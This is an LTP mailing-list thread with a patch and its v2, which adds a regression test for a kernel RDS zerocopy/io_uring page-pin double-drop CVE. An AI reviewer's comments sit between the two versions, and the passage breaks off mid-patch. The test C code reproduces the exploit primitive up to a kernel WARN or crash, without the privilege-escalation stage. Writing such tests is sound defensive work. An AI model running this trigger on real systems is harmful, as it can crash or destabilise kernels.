* [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test
@ 2026-05-23 10:17 Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
` (3 more replies)
0 siblings, 4 replies; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 10:17 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
include/lapi/io_uring.h | 4 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 429 ++++++++++++++++++
3 files changed, 434 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..88d693053 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,10 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+# define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..03b4fc128 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -83,6 +83,7 @@ cve-2021-22600 setsockopt09
cve-2021-38604 mq_notify03
cve-2022-0847 dirtypipe
cve-2022-2590 dirtyc0w_shmem
+cve-2026-43494 pintheft
cve-2022-23222 bpf_prog07
cve-2023-1829 tcindex01
cve-2023-0461 setsockopt10
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..8a7517353
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,429 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+/* io_uring IORING_REGISTER_CLONE_BUFFERS argument. */
+struct clone_buffers_arg {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct clone_buffers_arg clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1)) {
+ if (errno == ENOMEM)
+ tst_brk(TCONF, "Not enough memory to register io_uring buffer");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+ }
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang here or during
+ * cleanup() below.
+ */
+ for (i = 0, efaults = 0; i < GUP_PIN_COUNTING_BIAS; i++) {
+ /* rds_cmsg_zcopy() in net/rds/send.c */
+ *(uint32_t *)CMSG_DATA(cmsg) = (uint32_t)i;
+
+ ret = sendmsg(rds_fd, &msg, MSG_ZEROCOPY | MSG_DONTWAIT);
+ if (ret >= 0)
+ tst_brk(TBROK, "sendmsg() unexpectedly succeeded at iter %d", i);
+
+ if (errno == EFAULT)
+ efaults++;
+ else if (!first_bad_errno)
+ first_bad_errno = errno;
+ }
+
+ if (first_bad_errno) {
+ tst_res(TINFO, "sendmsg() returned unexpected errno %d (%s) on at least one iteration",
+ first_bad_errno, tst_strerrno(first_bad_errno));
+ }
+
+ tst_res(TINFO, "Completed %d/%d sendmsg() attempts with EFAULT",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ if (efaults == 0)
+ tst_brk(TCONF, "sendmsg() never returned EFAULT - GUP pin path not exercised");
+
+ if (efaults < GUP_PIN_COUNTING_BIAS)
+ tst_res(TWARN, "Only %d/%d sends returned EFAULT - FOLL_PIN counter may not be fully drained",
+ efaults, GUP_PIN_COUNTING_BIAS);
+
+ /*
+ * Unregistering fixed buffers on a vulnerable kernel triggers a
+ * double-unpin: io_uring tries to release references that the RDS bug
+ * already dropped, which may produce a kernel WARN or BUG_ON and taint.
+ */
+ cleanup();
+}
+
+static void poke_rss_accounting(void)
+{
+ char *mem;
+
+ mem = SAFE_MMAP(NULL, RSS_CHECK_SIZE, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mem, 0x5a, RSS_CHECK_SIZE);
+ SAFE_MUNMAP(mem, RSS_CHECK_SIZE);
+}
+
+static void run(void)
+{
+ pid_t pid;
+ int status;
+ int i;
+
+ /*
+ * Run the dangerous part in a child so that process teardown can expose
+ * delayed RSS/page-accounting damage before the parent reports TPASS.
+ */
+ pid = SAFE_FORK();
+ if (!pid) {
+ trigger();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+
+ /*
+ * The visible failure can be delayed until another mm is torn down.
+ * Create short-lived children that dirty and release anonymous memory to
+ * encourage RSS accounting checks before the parent reports success.
+ */
+ for (i = 0; i < RSS_CHECK_CHILDREN; i++) {
+ pid = SAFE_FORK();
+ if (!pid) {
+ poke_rss_accounting();
+ exit(0);
+ }
+
+ SAFE_WAITPID(pid, &status, 0);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RSS accounting checks");
+ return;
+ }
+
+ if (!WIFEXITED(status) || WEXITSTATUS(status))
+ return;
+ }
+
+ /*
+ * RDS/page cleanup can run asynchronously after userspace returns from
+ * sendmsg() and after file descriptors are closed. Wait before declaring
+ * that the kernel merely "seems" to have survived.
+ */
+ for (i = 0; i < CLEANUP_WAIT_SECS; i++) {
+ sleep(1);
+
+ if (tst_taint_check()) {
+ tst_res(TFAIL, "Kernel is vulnerable: tainted during RDS zerocopy cleanup");
+ return;
+ }
+ }
+
+ tst_res(TPASS, "Kernel seems to have survived RDS zerocopy cleanup");
+}
+
+static void cleanup(void)
+{
+ /*
+ * Unregister the clone first, then the source registration.
+ * Order matters: on a vulnerable kernel, unregistering ring_fd1
+ * (the original) after the FOLL_PIN references have been drained
+ * is what triggers the double-unpin WARN/BUG_ON.
+ */
+ if (buffer_cloned) {
+ io_uring_register(ring_fd2, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_cloned = 0;
+ }
+
+ if (buffer_registered) {
+ io_uring_register(ring_fd1, IORING_UNREGISTER_BUFFERS, NULL, 0);
+ buffer_registered = 0;
+ }
+
+ if (ring_fd2 >= 0) {
+ SAFE_CLOSE(ring_fd2);
+ ring_fd2 = -1;
+ }
+
+ if (ring_fd1 >= 0) {
+ SAFE_CLOSE(ring_fd1);
+ ring_fd1 = -1;
+ }
+
+ if (rds_fd >= 0) {
+ SAFE_CLOSE(rds_fd);
+ rds_fd = -1;
+ }
+
+ if (mapped_pages) {
+ SAFE_MUNMAP(mapped_pages, 2 * page_size);
+ mapped_pages = NULL;
+ }
+}
+
+static struct tst_test test = {
+ .test_all = run,
+ .setup = setup,
+ .cleanup = cleanup,
+ .forks_child = 1,
+ .taint_check = TST_TAINT_W | TST_TAINT_D,
+ .needs_kconfigs = (const char *[]) {
+ "CONFIG_RDS",
+ "CONFIG_RDS_TCP",
+ "CONFIG_IO_URING",
+ NULL
+ },
+ .save_restore = (const struct tst_path_val[]) {
+ {"/proc/sys/kernel/io_uring_disabled", "0",
+ TST_SR_SKIP_MISSING | TST_SR_TCONF_RO},
+ {}
+ },
+ .tags = (const struct tst_tag[]) {
+ {"linux-git", "e17492979319"},
+ {"CVE", "2026-43494"},
+ {}
+ }
+};
--
2.51.0
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply related [flat|nested] 19+ messages in thread
* Re: [LTP] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
@ 2026-05-23 11:19 ` linuxtestproject.agent
2026-05-25 9:36 ` Cyril Hrubis
2026-05-23 11:39 ` [LTP] [PATCH v2] " Sebastian Chlad
` (2 subsequent siblings)
3 siblings, 1 reply; 19+ messages in thread
From: linuxtestproject.agent @ 2026-05-23 11:19 UTC (permalink / raw)
To: Sebastian Chlad; +Cc: ltp
Hi Sebastian,
On Sat, 23 May 2026, Sebastian Chlad wrote:
> io_uring/pintheft: Add CVE-2026-43494 regression test
The commit author address (sebastianchlad@gmail.com) does not match the
Signed-off-by address (sebastian.chlad@suse.com). Either add a .mailmap
entry or re-send with a consistent identity.
> diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
> [...]
> +#ifndef IORING_REGISTER_CLONE_BUFFERS
> +# define IORING_REGISTER_CLONE_BUFFERS 30
> +#endif
Use `#define` without the extra space after `#`. All other fallback
defines in this file use `#define`, not `# define`.
> diff --git a/runtest/cve b/runtest/cve
> [...]
> +cve-2026-43494 pintheft
Wrong placement. The new entry lands between `cve-2022-2590` and
`cve-2022-23222`, in the middle of the 2022 block.
The pintheft test can crash, taint, or panic a vulnerable kernel
("Vulnerable kernels may crash, taint, panic, or hang during sendmsg()
or subsequent cleanup."). It belongs in the section below the
"Tests below may cause kernel memory leak" comment, in CVE-number order:
```
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
```
[...]
The test logic itself looks correct: the child triggers the double-drop
via the IORING_UNREGISTER_BUFFERS path, the parent monitors for taint
across the RSS accounting sweep and the 30-second async cleanup window,
and all resources are properly guarded in cleanup(). Kernel version
checks (io_uring ≥ 5.1, RDS/TCP TCONF handling, io_uring_disabled
save/restore) are in order. Based on kernel 7.1 as the current stable
reference, no staging flag is required.
---
Note:
Our agent completed the review of the patch. The full review can be
found at: (REVIEW_URL not set)
The agent can sometimes produce false positives although often its
findings are genuine. If you find issues with the review, please
comment this email or ignore the suggestions.
Regards,
LTP AI Reviewer
--
Mailing list info: https://lists.linux.it/listinfo/ltp
^ permalink raw reply [flat|nested] 19+ messages in thread
* [LTP] [PATCH v2] io_uring/pintheft: Add CVE-2026-43494 regression test
2026-05-23 10:17 [LTP] [PATCH] io_uring/pintheft: Add CVE-2026-43494 regression test Sebastian Chlad
2026-05-23 11:19 ` [LTP] " linuxtestproject.agent
@ 2026-05-23 11:39 ` Sebastian Chlad
2026-05-23 13:30 ` [LTP] " linuxtestproject.agent
2026-05-23 15:10 ` [LTP] [PATCH v3] " Sebastian Chlad
2026-05-23 16:57 ` [LTP] [PATCH v4] " Sebastian Chlad
3 siblings, 1 reply; 19+ messages in thread
From: Sebastian Chlad @ 2026-05-23 11:39 UTC (permalink / raw)
To: ltp; +Cc: Sebastian Chlad
Test for PinTheft (CVE-2026-43494), fixed by:
e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails")
The bug is in the RDS zerocopy send error path: when pinning user pages
for zerocopy send fails partway through, the error cleanup drops a page
reference that the RDS message cleanup will drop again. Combined with
io_uring fixed buffer registrations, this double-drop drains the
FOLL_PIN counter and causes a page-cache overwrite exploitable for local
privilege escalation (PinTheft).
Signed-off-by: Sebastian Chlad <sebastian.chlad@suse.com>
---
v2: Address AI review findings:
- Fix # define -> #define in lapi/io_uring.h
- Move runtest/cve entry to the "may cause kernel memory leak" section
include/lapi/io_uring.h | 4 +
runtest/cve | 1 +
testcases/kernel/syscalls/io_uring/pintheft.c | 429 ++++++++++++++++++
3 files changed, 434 insertions(+)
create mode 100644 testcases/kernel/syscalls/io_uring/pintheft.c
diff --git a/include/lapi/io_uring.h b/include/lapi/io_uring.h
index 2026863a2..1d54ff716 100644
--- a/include/lapi/io_uring.h
+++ b/include/lapi/io_uring.h
@@ -265,6 +265,10 @@ struct io_uring_probe {
#endif /* IOSQE_FIXED_FILE */
+#ifndef IORING_REGISTER_CLONE_BUFFERS
+#define IORING_REGISTER_CLONE_BUFFERS 30
+#endif
+
#ifndef IOSQE_IO_HADRLINK
/* like LINK, but stronger */
#define IOSQE_IO_HARDLINK_BIT 3
diff --git a/runtest/cve b/runtest/cve
index 74ee8e9ba..32a0f237d 100644
--- a/runtest/cve
+++ b/runtest/cve
@@ -95,4 +95,5 @@ cve-2025-38236 cve-2025-38236
cve-2025-21756 cve-2025-21756
cve-2026-31431 af_alg08
cve-2026-43284 xfrm01
+cve-2026-43494 pintheft
cve-2026-46300 xfrm02
diff --git a/testcases/kernel/syscalls/io_uring/pintheft.c b/testcases/kernel/syscalls/io_uring/pintheft.c
new file mode 100644
index 000000000..8a7517353
--- /dev/null
+++ b/testcases/kernel/syscalls/io_uring/pintheft.c
@@ -0,0 +1,429 @@
+// SPDX-License-Identifier: GPL-2.0-or-later
+/*
+ * Copyright (C) 2026 SUSE LLC Sebastian Chlad <sebastian.chlad@suse.com>
+ */
+
+/*\
+ * CVE-2026-43494
+ *
+ * Test for PinTheft, fixed by:
+ * e17492979319 ("net/rds: reset op_nents when zerocopy page pin fails").
+ *
+ * The bug is in the RDS zerocopy send error path. When RDS pins user pages for
+ * zerocopy send and a later page faults, the error cleanup can drop references
+ * for pages that are later released again during RDS message cleanup. This
+ * corrupts page reference accounting.
+ *
+ * The public exploit combines this RDS reference-counting bug with io_uring
+ * fixed buffers and cloned buffer registrations to turn stale page references
+ * into a page-cache overwrite and local privilege escalation.
+ *
+ * This test does not attempt privilege escalation. It triggers the underlying
+ * RDS zerocopy failure path by sending GUP_PIN_COUNTING_BIAS (1024) two-page
+ * iovecs where the first page is registered as an io_uring fixed buffer and
+ * the second page is PROT_NONE. Each failing send steals one FOLL_PIN
+ * reference; after 1024 sends the io_uring-held page pin is exhausted.
+ * Unregistering the fixed buffers on a vulnerable kernel then tries to unpin
+ * a page with no remaining FOLL_PIN references, triggering a kernel WARN or
+ * BUG_ON and tainting the kernel.
+ *
+ * Vulnerable kernels may crash, taint, panic, or hang during sendmsg() or
+ * subsequent cleanup. Run only on disposable systems.
+ *
+ * Reproducer is based on:
+ * https://github.com/v12-security/pocs/tree/main/pintheft
+ */
+
+#include <errno.h>
+#include <netinet/in.h>
+#include <stdint.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/uio.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+#include <linux/rds.h>
+
+#include "tst_test.h"
+#include "lapi/io_uring.h"
+#include "lapi/socket.h"
+
+#define CLEANUP_WAIT_SECS 30
+#define RSS_CHECK_CHILDREN 8
+#define RSS_CHECK_SIZE (16 * 1024 * 1024)
+
+/*
+ * io_uring pins fixed-buffer pages with FOLL_PIN, which adds
+ * GUP_PIN_COUNTING_BIAS (1024) to the page reference count. Each failing
+ * RDS zerocopy send steals one of those references via the double-drop bug.
+ * We need exactly 1024 iterations to fully drain the FOLL_PIN counter.
+ */
+#define GUP_PIN_COUNTING_BIAS 1024
+
+/* io_uring IORING_REGISTER_CLONE_BUFFERS argument. */
+struct clone_buffers_arg {
+ uint32_t src_fd;
+ uint32_t flags;
+ uint32_t pad[6];
+};
+
+static int ring_fd1 = -1;
+static int ring_fd2 = -1;
+static int rds_fd = -1;
+static int buffer_registered;
+static int buffer_cloned;
+static long page_size;
+static void *mapped_pages;
+
+static void cleanup(void);
+
+/* Inspired by liburing's io_uring_clone_buffers(), but using raw ring fds. */
+static int clone_buffers(int dst_fd, int src_fd)
+{
+ struct clone_buffers_arg clone;
+
+ memset(&clone, 0, sizeof(clone));
+ clone.src_fd = src_fd;
+
+ return io_uring_register(dst_fd, IORING_REGISTER_CLONE_BUFFERS,
+ &clone, 1);
+}
+
+static void setup(void)
+{
+ struct io_uring_params params = {};
+ struct iovec fixed_iov;
+ int val;
+
+ page_size = SAFE_SYSCONF(_SC_PAGESIZE);
+ io_uring_setup_supported_by_kernel();
+
+ /*
+ * The exploit primitive keeps one fixed-buffer registration alive and
+ * clones it to another ring.
+ */
+ ring_fd1 = io_uring_setup(1, ¶ms);
+ if (ring_fd1 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for first ring");
+
+ memset(¶ms, 0, sizeof(params));
+
+ ring_fd2 = io_uring_setup(1, ¶ms);
+ if (ring_fd2 < 0)
+ tst_brk(TBROK | TERRNO, "io_uring_setup() failed for second ring");
+
+ rds_fd = socket(AF_RDS, SOCK_SEQPACKET | SOCK_CLOEXEC, 0);
+ if (rds_fd < 0) {
+ if (errno == EAFNOSUPPORT || errno == ESOCKTNOSUPPORT ||
+ errno == EPROTONOSUPPORT || errno == ENOPROTOOPT)
+ tst_brk(TCONF | TERRNO, "RDS is not available");
+
+ tst_brk(TBROK | TERRNO, "socket(AF_RDS) failed");
+ }
+
+ /* PinTheft uses the RDS TCP transport, so base RDS is not enough. */
+ val = RDS_TRANS_TCP;
+ TEST(setsockopt(rds_fd, SOL_RDS, SO_RDS_TRANSPORT, &val, sizeof(val)));
+
+ if (TST_RET) {
+ if (TST_ERR == ENOPROTOOPT || TST_ERR == EINVAL)
+ tst_brk(TCONF | TERRNO, "RDS TCP transport is not available");
+
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_RDS_TRANSPORT) failed");
+ }
+
+ /*
+ * Allocate two adjacent pages: the first one will be pinned as an
+ * io_uring fixed buffer, and the second one will be made inaccessible.
+ */
+ mapped_pages = SAFE_MMAP(NULL, 2 * page_size, PROT_READ | PROT_WRITE,
+ MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
+ memset(mapped_pages, 0xa5, page_size);
+
+ /*
+ * RDS should successfully pin the first page, then fault on the second.
+ * That fault drives the buggy zerocopy error cleanup path.
+ */
+ SAFE_MPROTECT((char *)mapped_pages + page_size, page_size, PROT_NONE);
+
+ fixed_iov.iov_base = mapped_pages;
+ fixed_iov.iov_len = page_size;
+
+ /*
+ * Register only the first page as an io_uring fixed buffer. This creates
+ * the long-term page pin whose reference accounting the RDS bug damages.
+ */
+ if (io_uring_register(ring_fd1, IORING_REGISTER_BUFFERS, &fixed_iov, 1)) {
+ if (errno == ENOMEM)
+ tst_brk(TCONF, "Not enough memory to register io_uring buffer");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_BUFFERS failed");
+ }
+
+ buffer_registered = 1;
+
+ /*
+ * Clone the fixed buffer registration into the second ring, matching the
+ * public reproducer's lifetime pattern without performing the later
+ * page-cache overwrite stage.
+ */
+ if (clone_buffers(ring_fd2, ring_fd1)) {
+ if (errno == EINVAL || errno == EOPNOTSUPP)
+ tst_brk(TCONF | TERRNO, "IORING_REGISTER_CLONE_BUFFERS is not supported");
+
+ tst_brk(TBROK | TERRNO, "IORING_REGISTER_CLONE_BUFFERS failed");
+ }
+
+ buffer_cloned = 1;
+}
+
+static void trigger(void)
+{
+ /*
+ * Derive RDS ports from the process ID so concurrent test instances
+ * do not collide in the RDS port namespace.
+ */
+ const uint16_t src_port = (uint16_t)(20000 + (getpid() % 20000));
+ struct sockaddr_in bind_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port),
+ };
+ struct sockaddr_in dst_addr = {
+ .sin_family = AF_INET,
+ .sin_addr.s_addr = htonl(INADDR_LOOPBACK),
+ .sin_port = htons(src_port + 1),
+ };
+ char control[CMSG_SPACE(sizeof(uint32_t))];
+ struct cmsghdr *cmsg;
+ struct iovec iov = {
+ .iov_base = mapped_pages,
+ .iov_len = 2 * page_size,
+ };
+ struct msghdr msg = {
+ .msg_name = &dst_addr,
+ .msg_namelen = sizeof(dst_addr),
+ .msg_iov = &iov,
+ .msg_iovlen = 1,
+ .msg_control = control,
+ .msg_controllen = sizeof(control),
+ };
+ int ret;
+ int val;
+ int i, efaults, first_bad_errno = 0;
+
+ /* Mirror the public PoC trigger: RDS zerocopy over TCP. */
+ val = 1;
+ if (setsockopt(rds_fd, SOL_SOCKET, SO_ZEROCOPY, &val, sizeof(val))) {
+ if (errno == ENOPROTOOPT || errno == EINVAL)
+ tst_brk(TCONF | TERRNO, "SO_ZEROCOPY not supported on RDS sockets");
+ tst_brk(TBROK | TERRNO, "setsockopt(SO_ZEROCOPY) failed");
+ }
+
+ val = 2 * page_size * 4;
+ SAFE_SETSOCKOPT(rds_fd, SOL_SOCKET, SO_SNDBUF, &val, sizeof(val));
+
+ /*
+ * Bind to one loopback RDS port and send to another unbound local port.
+ * The sends are expected to fail before any useful delivery; the faulting
+ * iovec is the interesting part.
+ */
+ SAFE_BIND(rds_fd, (struct sockaddr *)&bind_addr, sizeof(bind_addr));
+
+ memset(control, 0, sizeof(control));
+ cmsg = (struct cmsghdr *)control;
+ cmsg->cmsg_level = SOL_RDS;
+ cmsg->cmsg_type = RDS_CMSG_ZCOPY_COOKIE;
+ cmsg->cmsg_len = CMSG_LEN(sizeof(uint32_t));
+
+ /*
+ * Repeatedly attempt a two-page zerocopy send where page 0 is pinnable
+ * and page 1 is PROT_NONE. Each attempt should:
+ * 1. Pin page 0 successfully.
+ * 2. Fault on page 1, so RDS error path drops page 0's reference.
+ * 3. RDS message cleanup drops page 0's reference again (the bug).
+ *
+ * On a vulnerable kernel this steals one FOLL_PIN reference per
+ * iteration; GUP_PIN_COUNTING_BIAS iterations drain the counter to zero.
+ * Unregistering the io_uring fixed buffer then tries to unpin a page
+ * with no remaining FOLL_PIN references, causing a kernel WARN/BUG_ON
+ * and taint.
+ *
+ * EFAULT is the expected error because page 1 is PROT_NONE. Other
+ * errors do not count as successful pin-theft iterations.
